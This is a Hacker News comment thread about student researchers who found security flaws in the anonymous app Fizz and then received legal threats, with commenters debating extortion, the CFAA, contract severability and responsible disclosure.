[HN Gopher] When your classmates threaten you with felony charges
       ___________________________________________________________________
        
       When your classmates threaten you with felony charges
        
       Author : epoch_100
       Score  : 377 points
       Date   : 2023-08-28 17:46 UTC (5 hours ago)
        
 (HTM) web link (miles.land)
 (TXT) w3m dump (miles.land)
        
       | seiferteric wrote:
       | How can you legally threaten someone and not face consequences,
       | but if you threaten someone with physical violence you can go to
       | jail?
        
         | vannevar wrote:
         | IANL, but in some jurisdictions and circumstances I understand
         | that threatening someone with criminal prosecution can itself
         | constitute the crime of extortion or abuse of process.
        
         | tantalor wrote:
         | https://en.wikipedia.org/wiki/Monopoly_on_violence
        
         | gruez wrote:
         | IANAL, but:
         | 
         | 1. threatening violence is explicitly a crime
         | 
         | 2. at a higher level, threatening violence is a crime because
         | the underlying act (committing violence) is also a crime.
         | threatening to do a legal act is largely legal. it's not
         | illegal to threaten reporting to the authorities, for instance.
        
           | seiferteric wrote:
           | Seems like legal terrorism.
        
             | [deleted]
        
             | kube-system wrote:
             | Only for uses of the word 'terrorism' so hyperbolic as to
             | be meaningless.
        
               | seiferteric wrote:
               | Just pointing out the absurdity of it. I would much
               | rather get punched in the face than serve 20 years in
               | prison, but it is illegal to threaten the former, but
               | perfectly fine to threaten the latter.
        
               | gruez wrote:
               | >I would much rather get punched in the face than serve
               | 20 years in prison, but it is illegal to threaten the
               | former, but perfectly fine to threaten the latter.
               | 
               | How about you don't do the action that makes you
               | punishable with 20 years in prison?
               | 
               | On a more practical level, if someone is breaking into
               | your house, should it be illegal to tell them to stop, on
               | pain of you calling the police which presumably would
               | cause them to be incarcerated?
        
               | jstarfish wrote:
               | > On a more practical level, if someone is breaking into
               | your house, should it be illegal to tell them to stop, on
               | pain of you calling the police which presumably would
               | cause them to be incarcerated?
               | 
               | Not a lawyer, but there's a fine line between extortion
               | and not-extortion.
               | 
               | It's not extortion when you're making the threat to
               | either stop an illegal behavior or secure something you
               | already have rights to. Like, "I'm calling the cops if
               | you don't return the kids on the time/date we agreed on
               | in the goddamn divorce papers" is not extortion, because
               | you have a legitimate claim to defend.
               | 
               | It _is_ extortion when you 're trying to use the threat
               | of law enforcement as a means of engineering consent or
               | coercing someone into doing something. Like, "I'm going
               | to call the cops and tell them about your shoplifting
               | unless you send me nudes/pay me $500/keep your mouth
               | shut." You can't leverage withheld knowledge of a crime
               | as a means of controlling someone. Otherwise it opens the
               | door to "Remember that time you raped me? You need to do
               | me another favor to make it right"-type of arrangements.
               | 
               | The first example would be extortion if the kids _were_
               | returned late but it was not reported, and the other
               | party continued _threatening_ to report it after the fact
               | to enforce future compliance.
        
               | seiferteric wrote:
               | No, because it would be legitimate? Just like it is
               | legitimate to use force to stop someone from hurting
               | you...
        
               | austhrow743 wrote:
               | The threatened party did the digital equivalent of
               | breaking in to the threateners house.
        
               | pessimizer wrote:
               | "It would be legitimate" is just an assertion. The entire
               | debate is about what is legitimate and what is not.
               | You're supposed to be saying _why_ things are or are not
               | legitimate, either legally or morally.
        
               | seiferteric wrote:
               | Sure, but if I shoot someone in self defense, there will
               | be an investigation and I have to show why I thought it
               | was legitimate. If a lawyer writes a baseless threatening
               | letter, at the very least I should be able to have the
               | bar association investigate.
        
               | kube-system wrote:
               | The person sending the letter also doesn't have a prison
               | nor the power to put anyone in it. It is a persuasive
               | legal letter stating someone's opinion about what
               | _someone else_ could potentially do.
               | 
               | A more equal comparison might be "If you tease a gorilla
               | they might seriously hurt you"
        
               | kjjw wrote:
               | [flagged]
        
           | valbaca wrote:
           | > threatening to do a legal act is largely legal. it's not
           | illegal to threaten reporting to the authorities, for
           | instance.
           | 
           | It absolutely can be illegal, in the case of extortion. If
           | you say "do this or I turn you in" that's extortion.
        
           | [deleted]
        
         | dundarious wrote:
         | Your sentiment is silly. In general, with important caveats I
         | will not state here, you can of course voice a threat to do an
         | action that is legal (file a lawsuit), and may not voice a
         | threat to do an action that is illegal (physical assault).
        
           | valbaca wrote:
           | If it's a threat, then that's literally blackmail.
           | 
           | It's only legal to use the legal action, period. Once you
           | pull in a THREAT, it becomes blackmail/extortion.
        
             | dundarious wrote:
             | A cease and desist letter is a "threat" and is not
             | illegal/blackmail/extortion.
        
           | seiferteric wrote:
           | I'm not even suggesting it has to happen at a legal level,
           | but perhaps at a professional level, I would think any lawyer
           | writing baseless threatening letters to people should be
           | subject to losing there license.
        
             | kube-system wrote:
             | Writing a demand letter that leans in favor of your
             | client's interests is not only okay, it is the standard
             | course of action for a civil dispute.
             | 
             | https://www.law.cornell.edu/wex/demand_letter
        
               | seiferteric wrote:
               | Perhaps they shouldn't. If we lived in a world where
               | lawyers were more cautions about what they attached there
               | name to out of concern for losing their license we would
               | probably be better off. Less bullying by corporations
               | with lots of money etc. No problems with demand letters
               | for legitimate issues that are well supported by evidence
               | though.
        
               | gruez wrote:
               | >If we lived in a world where lawyers were more cautions
               | about what they attached there name to out of concern for
               | losing their license we would probably be better off.
               | 
               | That's already the case. Lawyers can be disbarred for
               | filing frivolous lawsuits.
        
               | seiferteric wrote:
               | I'm aware, and yet this letter was written and signed by
               | a lawyer who probably knew better and will likely face no
               | consequences.
        
               | pseg134 wrote:
               | You seem to have the facts of this case incorrect. They
               | definitely broke the law by hacking this app without
               | prior authorization. You may disagree with the law but I
               | don't understand how you made the leap to calling for the
               | suspension of specific attorneys.
        
               | dundarious wrote:
               | I'm in favor of the work done by the security
               | researchers, and the defense offered by the EFF. However,
               | your first comment was such a surface level
               | understanding, and I wanted to bring it back to reality.
               | 
               | The general form of such a "legal threat" (threat
               | relating to the law) is perfectly reasonable, normal, and
               | _legal_ (as in, conforming to the law). It 's a standard
               | part of practicing law.
               | 
               | However, in this specific case, they do appear to have
               | broken one _professional_ rule, regarding the threat of
               | criminal prosecution _conditional_ on a civil demand.
               | 
               | Aside from that one professional rule, the Fizz/Buzz
               | letter was probably perfectly technically accurate.
               | Whether the DA would take up the case, I doubt, but
               | that's up to their discretion/advice from the DoJ, not
               | based on the legal code.
               | 
               | I think Fizz/Buzz were incredibly foolish to send such a
               | letter, as the researchers were essentially good
               | samaritans being punished for their good deed (probably
               | only because customers don't like it when supposedly
               | professional organizations are found to be in need of
               | such basic good deeds from good samaritans, and Fizz/Buzz
               | would rather punish the good samaritans instead of
               | "suffering" the "embarrassment" of public knowledge).
        
               | kube-system wrote:
               | The role of a lawyer is to make persuasive arguments in
               | their clients favor, and those arguments are supported by
               | a wide spectrum in strength of evidence and legal
               | opinion.
               | 
               | Completely baseless stuff can get lawyers disbarred, but
               | many things are shades of gray. The way the CFAA is
               | written, just about any security research on someone
               | else's machine that doesn't include "we got permission in
               | advance" often falls into this gray area.
               | 
               | The fact that the DOJ doesn't prosecute good-faith
               | security research is DOJ policy, not actual law. The law
               | as-written doesn't have a good-faith exemption.
        
               | kjjw wrote:
               | [flagged]
        
         | charonn0 wrote:
         | It's perfectly legal to threaten to do something that's
         | perfectly legal.
        
           | seiferteric wrote:
           | Perfectly legal, but unethical. The motives are clear, they
           | want to threaten/bully someone into silence who has
           | information that could hurt their business. I don't think
           | lawyers that engage in this behavior should be allowed to
           | practice law, that's all.
        
       | SenAnder wrote:
       | > And at the end of their threat they had a demand: don't ever
       | talk about your findings publicly. Essentially, if you agree to
       | silence, we won't pursue legal action.
       | 
       | Legally, can this cover talking to e.g. state prosecutors and the
       | police as well? Because claiming to be "100% secure", knowing you
       | are not secure, and your users have no protection against spying
       | from you or any minimally competent hacker, is fraud at minimum,
       | but closer to criminal wiretapping, since you're knowingly
       | tricking your users into revealing their secrets on your service,
       | thinking they are "100% secure".
       | 
       | That this ended "amicably" is frankly a miscarriage of justice -
       | the Fizz team should be facing fraud charges.
        
         | SoftTalker wrote:
         | They could be legitimately ignorant of their security
         | vulnerabilities. That might go to negligence more than fraud.
        
           | [deleted]
        
           | SenAnder wrote:
           | They could not have been ignorant of storing non-anonymous,
           | plain-text messages. Even if we don't count that as insecure,
           | they can only appeal to ignorance/negligence up until the
           | point the security researchers informed them of their
           | vulnerabilities.
           | 
           | After that, that they continued their "100% secure" marketing
           | on one side, while threatening researchers into silence on
           | the other, is plainly malicious.
        
         | manicennui wrote:
         | I don't think the demands of Fizz have much legal standing.
         | 
         | We care more about corporations than citizens in the US.
         | Advertising in the US is full of false claims. We ignore this
         | because we pretend like words have no meaning.
        
           | sleepybrett wrote:
           | there is a carve out in the law for 'puffery', ie
           | exaggerations. So 'the best hamburger in town' would be
           | puffery.
        
             | manicennui wrote:
             | In the US?
        
               | esprehn wrote:
               | Yup. https://www.legalmatch.com/law-
               | library/article/puffery-laws....
               | 
               | If a reasonable person would understand the claim to be
               | exaggeration (ex. World's best coffee) the law doesn't
               | consider it false advertising.
        
       | ryandrake wrote:
       | > One Friday night, we decided to explore whether Fizz was really
       | "100% secure" like they claimed. Well, dear reader, Fizz was not
       | 100% secure. In fact, they hardly had any security protections at
       | all.
       | 
       | It's practically a given that the actual security (or privacy) of
       | a software is inversely proportional to its claimed security and
       | how loud those claims are. Also, the companies that pay the least
       | attention to security are always the ones who later, after the
       | breach, say "We take security very seriously..."
        
       | consoomer wrote:
       | In my opinion, they went too far and exposed themselves by
       | telling the company.
       | 
       | In all honesty, nothing good usually comes from that. If you
       | wanted the truth to be exposed, they would have been better off
       | exposing it anonymously to the company and/or public if needed.
       | 
       | It's one thing to happen upon a vulnerability in normal use and
       | report it. It's a different beast to gain access to servers you
       | don't own and start touching things.
        
       | dfxm12 wrote:
       | Anyone can make a threat. There's a bit of smarts needed to
       | classify a "threat" as credible or not. Only really a law
       | enforcement officer can credibly bring charges against you.
       | Unfortunately, we live in a society where someone with more money
       | than you can use the courts to harass you, so you even if you
       | don't fear illegitimate felony charges, you can get pretty much
       | get sued for any reason at any time, which brings with it
       | consequences if you don't have a lawyer to deal with it. So I
       | understand why someone might be scared in this situation, and
       | luckily they were able to find someone to work with them, _pro
       | bono_. I really wish the law had some pro-active mechanism for
       | dealing with this type of legal bullying.
        
       | datacruncher01 wrote:
       | Best advice I can give someone is never do security research for
       | a company without expressed written consent to do so and document
       | everything as agreed to.
       | 
       | Payouts for finding bugs when there isn't an already established
       | process are either not going to be worth your time or will be
       | seen as malicious activity.
        
       | [deleted]
        
       | mewse-hn wrote:
       | Crazy story. The Stanford daily article has copies of the lawyer
       | letters back and forth, they are intense - and we wouldn't be
       | able to read them if the EFF didn't step up.
       | 
       | https://stanforddaily.com/2022/11/01/opinion-fizz-previously...
        
       | wang_li wrote:
       | Yet another example of someone security "testing" someone else's
       | servers/systems without permission. That's called hacking.
       | Doesn't matter if you have "good faith" or not. It's not your
       | property and you don't get to access it in ways the owners don't
       | desire you to access it without being subject to potential civil
       | and criminal enforcement against you.
        
         | edwinjm wrote:
         | If they don't do it, criminals will do it. I know what my
         | preference is.
        
         | Buttons840 wrote:
         | Meanwhile companies leak the private data of millions of people
         | and nothing happens.
         | 
         | If a curious kid does a port scan police will smash down doors.
         | People will face decades in prison.
         | 
         | If a negligent company leaks the private data of every single
         | American, well, gee, what could we have done more, we had that
         | one company do an audit and they didn't find anything and, gee,
         | we're just really sorry, so lets all move on and here's a free
         | year of credit monitoring which you may choose to continue
         | paying us for at the end of the free year.
        
         | SenAnder wrote:
         | Look at it from a consumer rights angle. A product is
         | advertised as having some feature ("100% security" in this
         | case), but nobody is allowed to test (even without causing any
         | harm) if that is true.
         | 
         | It's effectively legalizing fraud for a big chunk of computer
         | security. Sure fraud itself is technically still illegal, but
         | so is exposing it.
        
       | hitekker wrote:
       | Interestingly, Ashton Cofer and Teddy Solomon of Fizz tried some
       | PR damage control when their wrongdoing came to light
       | https://stanforddaily.com/2022/11/01/opinion-fizz-previously....
       | Their response was weak and it seems like they've refused to
       | comment on the debacle since then.
        
         | mustacheemperor wrote:
         | Per the Stanford Daily article linked in the OP [0], they have
         | also removed the statement addressing this incident and
         | supposed improvements from their website.
         | 
         | >Although Fizz released a statement entitled "Security
         | Improvements Regarding Fizz" on Dec. 7, 2021, the page is no
         | longer navigable from Fizz's website or Google searches as of
         | the time of this article's publication.
         | 
         | And, it seems likely the app still stores personally
         | identifiable information about its "anonymous" users' activity.
         | 
         | > Moreover, we still don't know whether our data is internally
         | anonymized. The founders told The Daily last year that users
         | are identifiable to developers. Fizz's privacy policy implies
         | that this is still the case
         | 
         | I suppose the 'developers' may include the same founders who
         | have refused to comment on this, removed their company's
         | communications about it, and originally leveraged legal threats
         | over being caught marketing a completely leaky bucket as a
         | "100% secure social media app." Can't say I'm in a hurry to put
         | my information on Fizz.
        
           | omoikane wrote:
           | "Security Improvments Regarding Fizz":
           | 
           | https://web.archive.org/web/20220204044213/https://fizzsocia.
           | ..
           | 
           | What I was looking for was if they really had a page that
           | claimed "100% secure", but I don't think that was captured by
           | archive.org
        
       | jbombadil wrote:
       | I don't understand why in both contracts and legal communication
       | (particularly threatening one), there is little to no consequence
       | for the writing party to get things right.
       | 
       | I've seen examples of an employee contract, with things like "if
       | any piece of this contract is invalid it doesn't invalidate the
       | rest of the contract". The employer is basically trying to
       | enforce their rules (reasonable), but they have no negative
       | consequences if what they write is not allowed. At most a court
       | deems that piece invalid, but that's it. The onus is on the
       | reader to know (which tends to be a much weaker party).
       | 
       | Same here. Why can a company send a threatening letter ("you'll
       | go 20 years to federal prison for this!!"), when it's clearly
       | false? Shouldn't there be an onus on the writer to ensure that
       | what they write is reasonable? And if it's absurdly and provably
       | wrong, shouldn't there be some negative consequences more than
       | "oh, nevermind"?
        
         | treis wrote:
         | These guys (at least according to the angry letter) went beyond
         | reasonable safe harbor for security researchers. They created
         | admin accounts and accessed data. Definitely not clearly false
         | that there's no liability here. Probably actually true.
        
         | convolvatron wrote:
         | I recently got supremely frustrated by this in civil
         | litigation. The claimant kept filing absolute fictional
         | nonsense with no justification, and I had to run around trying
         | to prove these things were not the case and racking up legal
         | fees the whole time. apparently you can just say whatever you
         | want.
        
         | anigbrowl wrote:
         | Because contract law mostly views things through the lens of
         | property rights. Historically those with the most property get
         | the most rights, so they're able to get away with imposing
         | wildly asymmetrical terms on the implicit basis that society
         | will collapse if they're not allowed to.
        
         | mentalpiracy wrote:
         | > I've seen examples of an employee contract, with things like
         | "if any piece of this contract is invalid it doesn't invalidate
         | the rest of the contract".
         | 
         | This concept of severability exists in basically all contracts,
         | and is generally limited to sections that are not fundamental
         | to the nature of the agreement. (The extent of what qualifies
         | as fundamental is, as you said, up to a court to interpret.)
         | 
         | In your specific example of an employee contract, severability
         | actually protects you too, by ensuring all the other covenants
         | of your agreement - especially the ones that protect you as the
         | individual - will remain in force even if a sub section is
         | invalidated. Otherwise, if the whole contract were invalidated,
         | you'd be starting from nothing (and likely out of a job). Some
         | protections are better than zero.
        
           | Buttons840 wrote:
           | > especially the ones that protect you as the individual -
           | will remain in force even if a sub section is invalidated
           | 
           | In a right-to-work state, what protections can an individual
           | realistically expect to receive from a contract?
        
             | mentalpiracy wrote:
             | An employment contract is intended to backstop everything
             | you were promised or negotiated during the hiring process.
             | It doesn't really matter if you're in a right-to-work state
             | or not, an employment contract provides you with recourse
             | if the terms are not upheld by your employer. In the case
             | of a breach, that is something you can remedy in court.
             | (Whether or not it is worthwhile to pursue that legal case
             | depends entirely on the context)
             | 
             | * anything you negotiated during hiring like RSU or sign-on
             | bonuses
             | 
             | * stating your salary, benefits, vacation is the basis for
             | protecting you from theft of that compensation.
             | 
             | * IP ownership clauses can protect your independent, off
             | the clock work
             | 
             | * work location, if you are hired remote and then
             | threatened with termination due to new RTO policies
             | 
             | I am just pulling from the top of my head general examples.
        
             | abduhl wrote:
             | The employment of an individual that has an employment
             | contract is governed by the strictest set of rules between
             | the right-to-work state's laws and the employment contract.
             | Literally every permissible provision of an employment
             | contract can be a protection: golden parachutes, vacation
             | days, sick days, payout of the same, IP guarantees for
             | hobby work, employment benefits, etc.
             | 
             | Right to work at its most generic level means freedom from
             | being forced into a union, not freedom from being held to a
             | contract.
        
               | feoren wrote:
               | > golden parachutes
               | 
               | Nobody has these except top execs who are already in a
               | huge position of power.
               | 
               | > vacation days, sick days, payout of the same
               | 
               | Nope, not anymore: nothing is guaranteed with "flexible
               | time off". I literally cannot meet my performance goal if
               | I take more than 1 day of sick/vacation day PER YEAR.
               | Yes, my raises are tied to this performance goal. Yes,
               | it's probably illegal, but who cares? Nobody is ever
               | going to do anything about it. This is every company with
               | FTO. Who gets "paid out" for PTO anymore?
               | 
               | > IP guarantees for hobby work
               | 
               | You're joking, right? Most employment contracts claim
               | that they own the slam poetry you write on your napkin at
               | 2:00 am on a Saturday while high on your couch. Every
               | mention of IP in an employment contract is as greedy as
               | possible.
               | 
               | > employment benefits
               | 
               | Ok but in a right to work state these can be terminated
               | any time anyway.
               | 
               | Literally nothing about an employment contract is ever
               | written in favor of the actual employee. Of course it's
               | not: _they wrote it_. If every company in an industry
               | does this and they all refuse to negotiate, workers have
               | no choice but to sign it. It 's crazy to me to think that
               | a U.S. company would voluntarily ever do anything in the
               | interest of any of its employees, ever. This is the whole
               | reason why ambiguities are supposed to go in favor of the
               | party that _didn 't_ write it. Voiding any part of an
               | employee contract can therefore only ever benefit the
               | employee (except possibly the part where they get paid).
               | If you want protections for employees, look to regulation
               | and unions, not contracts written by the employer.
        
               | [deleted]
        
               | abduhl wrote:
               | I don't know what to say in response to your complaints
               | except negotiate better working conditions next time you
               | get hired. The company wrote it. You accepted it. You can
               | always ask for different terms and walk away if they
               | don't agree, start your own company, or change industries
               | to one where companies are willing to negotiate.
               | 
               | If you want protections for employees, sure you can
               | (erroneously, in my opinion) look to unions. If you want
               | protections for yourself, look to negotiate.
        
               | _dain_ wrote:
               | _> I literally cannot meet my performance goal if I take
               | more than 1 day of sick /vacation day PER YEAR. _
               | 
               | why not get another job?
        
               | feoren wrote:
               | Because for all the bullshit I have to put up with, and
               | all the things I hate about management, and all the
               | things that could easily be better but for one asshole
               | vice-president needing to cosplay Business Hero ... for
               | all of that, the job is _deeply interesting_ and I learn
               | a ton every day. And virtually every other job on the
               | market is mind-numbingly boring and pointless.
               | 
               | And because I like my immediate teammates a lot.
               | 
               | And because the issues I'm railing against are incredibly
               | pervasive in most companies in the United States and
               | probably beyond. Our capitalism has been completely taken
               | over by a caste of parasitic leeches who enshittify
               | everything they touch and I am under no illusion that any
               | other job would be any different.
               | 
               | But I do also look for other jobs regularly. Finding a
               | job that is both interesting (<1%) and not full of
               | shithead management (<5%) is about 1 in 2,000.
        
               | [deleted]
        
             | ZoomerCretin wrote:
             | "Right-to-Work" refers to the inability of unions to
             | negotiate closed shops, where all employees of that "shop"
             | must be part of the union.
             | 
             | You're thinking of "At-Will" employment, which allows
             | employees and employers to end an employment relationship
             | at any time for any (except for the few illegal) reasons.
        
           | ipaddr wrote:
           | But then your dismal will be governed by common law which
           | could mean years of back pay depending on where you live.
        
         | LastTrain wrote:
         | There can be consequences, but you have to be able to
         | demonstrate you have been harmed. So, in what way have you been
         | harmed by such a threat, and what is just compensation? How
         | much will it cost to hire a lawyer to sue for compensation, and
         | what are your chances of success? These are the same kinds of
         | questions the entity sending the threatening letter asked
         | themselves as well. If you think it is unfair because they have
         | more resources, well that is more of a general societal problem
         | - if you have more money you have access to better justice in
         | all forms.
        
         | fallingknife wrote:
         | That's not the language they use. It will be more like "your
         | actions may violate (law ref) and if convicted, penalties may
         | be up to 20 years in prison." And how do you keep people from
         | saying that? It's basically a statement of fact. If you have a
         | problem with this, then your issue is with Congress for writing
         | such a vague law.
        
           | SilasX wrote:
           | "That's not the language they used. They simply admired your
           | place of business and reflected on what a shame it would be
           | if a negative event happened to it. How would you keep people
           | from saying that? It's basically a statement of fact..."
        
           | arrosenberg wrote:
           | No, you are talking about criminal law. What OP is talking
           | about is severability, which exists so that if a judge
           | determines Clause X violates the law, they can still
           | (attempt) to enforce the rest of the contract if X can be
           | easily remedied. I.e. The contract says no lunch breaks but
           | CalOSHA regulations say 30 minutes required, the contractor
           | can't violate the contract in its' entirety, they just take
           | the breaks and amend the contract if the employer pushes it.
           | 
           | I disagree with OP - a judge can always choose to invalidate
           | a contract, regardless of severability. It is in there for
           | the convenience of the parties, and I've not heard of it
           | being used in bad faith.
        
           | ender341341 wrote:
           | you can read the language they do use here
           | https://stanforddaily.com/2022/11/01/opinion-fizz-
           | previously...
           | 
           | they threaten if they receive written confirmation that the
           | researchers won't discuss the security issues they won't
           | pursue charges.
           | 
           | The lawyers were very much not "for your information you
           | could be liable for x if someone responded poorly", they were
           | in fact responding poorly.
        
         | bagels wrote:
         | Even if you get it right, the court can change what is right at
         | any time by ruling differently than last time.
        
         | gingerrr wrote:
         | > "if any piece of this contract is invalid it doesn't
         | invalidate the rest of the contract".
         | 
         | Severability (the ability to "sever" part of a contract,
         | leaving the remainder intact so long as it's not fundamentally
         | a change to the contract's terms) comes from constitutional law
         | and was intended to prevent wholesale overturning of previous
         | precedent with each new case. It protects _both_ parties from
         | squirreling out of an entire legal obligation on a
         | technicality, or writing poison pills into a contract you know
         | won 't stand up to legal scrutiny.
         | 
         | If part of the contract is invalidated, they can't leverage it.
         | If that part being invalidated changes the contract
         | fundamentally, the entire contract is voided. What more do you
         | want?
         | 
         | It seems like you're arguing for some sort of _punitive_
         | response to authoring a bad contract? That seems like a pretty
         | awful idea re: chilling effect on all legal /business
         | relationship formation, and wouldn't that likely impact the
         | weaker parties worse as they have less access to high-powered
         | legal authors? That means that even negotiating wording changes
         | to a contract becomes a liability nightmare for the
         | negotiators, doesn't that make the potential liability burden
         | even more lopsided against small actors sitting across the
         | table from entire legal teams?
         | 
         | I guess I'm having trouble seeing how the world you're
         | imagining wouldn't end up introducing bigger risk for weaker
         | parties than the world we're already in.
        
           | cj wrote:
           | Practical example: your employment agreement has a non-
           | compete clause. If 3 years later non-competes are no longer
           | allowed in employment contracts, you won't want to be
           | suddenly unemployed because your employment contract is no
           | longer valid.
           | 
           | You'll want the originally negotiated contract, minus the
           | clause that can't be enforced.
        
           | jbombadil wrote:
           | Thanks for the explanation and the term "severability". I
           | understand its point now and it makes sense to have it
           | conceptually. I also didn't know about this part: > so long
           | as it's not fundamentally a change to the contract's terms
           | 
           | However, taken down one notch from theoretical to more
           | practical:
           | 
           | > It seems like you're arguing for some sort of punitive
           | response to authoring a bad contract?
           | 
           | Not quite so bluntly, but yes. There's obviously a gray area
           | here. So not for mistakes, subtle technicalities. But if one
           | party is being intentionally or absurdly overreaching then
           | yes, I believe there should be some proportional punishment.
           | Particularly if the writing party's intent is to scare out of
           | inaction more than a core belief that their wording is true.
           | 
           | The way I think of it is maybe in similar terms as disbarring
           | or something like that. So not something that would be a day-
           | to-day concern for honest people doing honest work, but some
           | potential negative consequences if "you're taking it too far"
           | (of course this last bit is completely handwavy).
           | 
           | Maybe such a mechanism exists that I'm not aware of.
        
             | gingerrr wrote:
             | I do like the idea theoretically as a deterrent against bad
             | actors abusing the law to bully weaker parties - but the
             | difficult part is in the details of implementation: how do
             | you separate intent to abuse from incompetence?
             | 
             | Also confusing the mix here is who you are punishing when
             | violations are found - is it the attorneys drafting the
             | agreement? They're as likely to be unaffiliated with the
             | company executing the contract as not, not everyone bothers
             | with in-house counsel. Is it the company leadership
             | forwarding the contract?
             | 
             | What's the scope of the punishment? An embargo on all new
             | legal agreements for a period of time, or only with the
             | parties to the bad contract? A requirement for change in
             | legal representation? Now we get into overreach questions
             | on the punishment side.
             | 
             | All of that to say I am guessing the reason something like
             | this _doesn 't_ exist yet afaik is because it's a
             | logistical nightmare to actually put into practice.
             | 
             | The closest I can think of to something that might work is
             | like a credit score/rating for companies for "contract
             | integrity" or something that goes down with negative
             | rulings - but what 3rd party would own that? Even just the
             | thought experiment spawns too many subqueries to resolve
             | simply.
             | 
             | None of that contradicts the fact it's a good idea - just
             | not sure if even possible to bring to life!
        
             | nostrademons wrote:
             | I'm reminded of the concept of a "tact filter", which is
             | basically "do you alter what you say to avoid causing
             | offense, or do you alter what you hear to avoid taking
             | offense?"
             | 
             | https://www.mit.edu/~jcb/tact.html
             | 
             | The part the original essay leaves out is that _optimal
             | behavior depends on the scale and persistence of the
             | relationship_. In personal, 1:1, long-term relationships,
             | you should apply outgoing tact filters because if you cause
             | offense you 've torched the relationship permanently and
             | will suffer long-term consequences from it. But in public
             | discourse, many-to-many, transactional relationships, it's
             | better to apply _incoming_ tact filters because there are
             | so many people you interact with that invariably there will
             | be someone who forgot to set their outgoing tact filter.
             | (And in public discourse where you have longstanding
             | relationships with your customers with serious negative
             | consequences for pissing them off, you want to be _very,
             | very careful_ what you say. The entire field of PR is
             | devoted to this.)
             | 
             | So anyone who spends a significant amount of time with the
             | general public basically needs to develop a translation
             | layer. "i hope you hang yourself" on an Internet forum
             | becomes "somebody had a bad day and is letting off steam by
             | trolling." "Your business is probably in violation of
             | federal labor laws because you haven't displayed these $400
             | posters we're trying to sell you" becomes "Better download
             | some PDFs off the Department of Labor for free" [1]. "We're
             | calling from XYZ Collection Agency about your debt" or
             | "This is the Deputy Sheriffs office. You have a warrant out
             | for your arrest for failing to appear for jury duty" or
             | "This is the IRS calling requesting you pay back taxes in
             | the amount of $X over the phone" = ignore them and hang up
             | because it's a scam. "Continued involvement in Russia's
             | internal affairs will lead to nuclear consequences" = Putin
             | is feeling insecure with his base and needs to rattle some
             | sabers to maintain support. "You are in violation of
             | several state and federal laws facing up to 20 years in
             | prison" = they want something from me, lawyer up and make
             | sure we're not in violation and then let's negotiate.
             | 
             | [1] https://www.dol.gov/general/topics/posters
        
         | bdowling wrote:
         | It's a balance between encouraging people to stand up for their
         | rights on one hand and discouraging filing of frivolous
         | lawsuits on the other. The American system is "everyone pays
         | their own legal fees", which encourages injured parties to
         | file. The U.K. on the other hand is a "loser pays both parties'
         | legal fees" (generally), which discourages a lot of plaintiffs
         | from filing, even when they have been significantly harmed.
        
         | MajimasEyepatch wrote:
         | There is obviously such a thing as going too far, but it's kind
         | of hard to draw a clear line. In a good faith context, laws and
         | precedents can change quickly, sometimes based on the whim of a
         | judge, and there are many areas of law where there is no clear
         | precedent or where guidance is fuzzy. In those cases, it's
         | important to have severability so that entire contracts don't
         | have to be renegotiated because one small clause didn't hold up
         | in court.
         | 
         | Imagine an employment contract that contains a non-compete
         | clause (ignore, for a moment, your personal beliefs about non-
         | compete clauses). The company may have a single employment
         | contract that they use everywhere, and so in states where non-
         | competes are illegal, the severability clause allows them to
         | avoid having separate contracts for each jurisdiction. And now
         | suppose that a state that once allowed non-competes passes a
         | law banning them: should every employment contract with a non-
         | compete clause suddenly become null and void? Of course not.
         | That's what severability is for.
         | 
         | In the case in the OP, it's hard to say what the context is of
         | the threat, but I imagine something along the lines of,
         | "Unauthorized access to our computer network is a federal crime
         | under statute XYZ punishable by up to 20 years in prison."
         | Scary as hell to a layperson, but it's not strictly speaking
         | untrue, even if most lawyers would roll their eyes and say that
         | they're full of shit. Sure, it's misleading, and a bad actor
         | could easily take it too far, but it's hard to know exactly
         | where to draw the line if lawyers couch a threat in enough
         | qualifiers.
         | 
         | At the end of the day, documents like this are written by
         | lawyers in legalese that's not designed for ordinary people.
         | It's shitty that they threatened some college students with
         | this, and whatever lawyer did write and send this letter on
         | behalf of the company gave that company tremendously poor
         | advice. I guess you could complain to the bar, but it would be
         | very hard to make a compelling case in a situation like this.
         | 
         | (This is also one of the reasons why collective bargaining is
         | so valuable. A union can afford legal representation to go toe
         | to toe with the company's lawyers. Individual employees can't
         | do that.)
        
           | notpushkin wrote:
           | > At the end of the day, documents like this are written by
           | lawyers in legalese that's not designed for ordinary people.
           | 
           | Does it have to be this way?
        
             | ipaddr wrote:
             | Without a common language with exact meaning for phrases
             | that are accepted by both parties contracts would be
             | impossible to enforce and become useless.
        
       | 1970-01-01 wrote:
       | Ethically, they did the good thing by challenging the "100%
       | secure" claim. Legally, they were hacking (without permission).
       | Very high praise to the EFF for getting them out of trouble. Go
       | donate.
        
       | sublinear wrote:
       | > Stay calm. I can't tell you how much I wanted to curse out the
       | Fizz team over email. But no. We had to keep it professional --
       | even as they resorted to legal scare tactics. Your goal when you
       | get a legal threat is to stay out of trouble. To resolve the
       | situation. That's it. _The temporary satisfaction of saying "fuck
       | you" isn't worth giving up the possibility of an amicable
       | resolution._
       | 
       | Maybe it's because I'm getting old, but it would never cross my
       | mind to take any of this personally.
       | 
       | If they're this bad at security, this bad at marketing, and then
       | respond to a fairly standard vulnerability disclosure with legal
       | threats it's pretty clear they have no idea what they're doing.
       | 
       | Being the "good guy" can sometimes be harder than being the "bad
       | guy", but suppressing your emotions is a basic requirement for
       | being either "guy".
        
         | kdmccormick wrote:
         | > Maybe it's because I'm getting old
         | 
         | Yup, that's it :) These kids are either in college or just
         | graduated. They were smart enough to get themselves legal help
         | before saying anything stupid, which is impressive. Cut them
         | some slack!
        
         | ngai_aku wrote:
         | > If they're this bad at security, this bad at marketing, and
         | then respond to a fairly standard vulnerability disclosure with
         | legal threats it's pretty clear they have no idea what they're
         | doing.
         | 
         | And yet, according to the linked article in the Stanford Daily,
         | they received $4.5 million in funding
        
       | pie_R_sqrd wrote:
       | Interesting. My school has a very similar platform, SideChat,
       | which I doubt is much different. Makes me wonder how much they
       | know about me, as I was permanently banned last year for
       | questioning the validity of "gender-affirming care."
        
         | Zone3513 wrote:
         | [flagged]
        
       | withinrafael wrote:
       | The article asserts "there are an increasing number of resources
       | available to good-faith security researchers who face legal
       | threats". Is there an example of such, outside of the EFF? How do
       | beginners find them?
        
       | [deleted]
        
       | f0e4c2f7 wrote:
       | I feel like this article reflects an overall positive change in
       | the way disclosure is handled today. Back in the 90s this was the
       | sort of thing every company did. Companies would threaten
       | lawsuits, or disclosure in the first place seemed legally
       | dubious. Discussions in forums / BBS's would be around if it was
       | safe to disclose at all. Suggestions of anonymous email accounts
       | and that sort of thing.
       | 
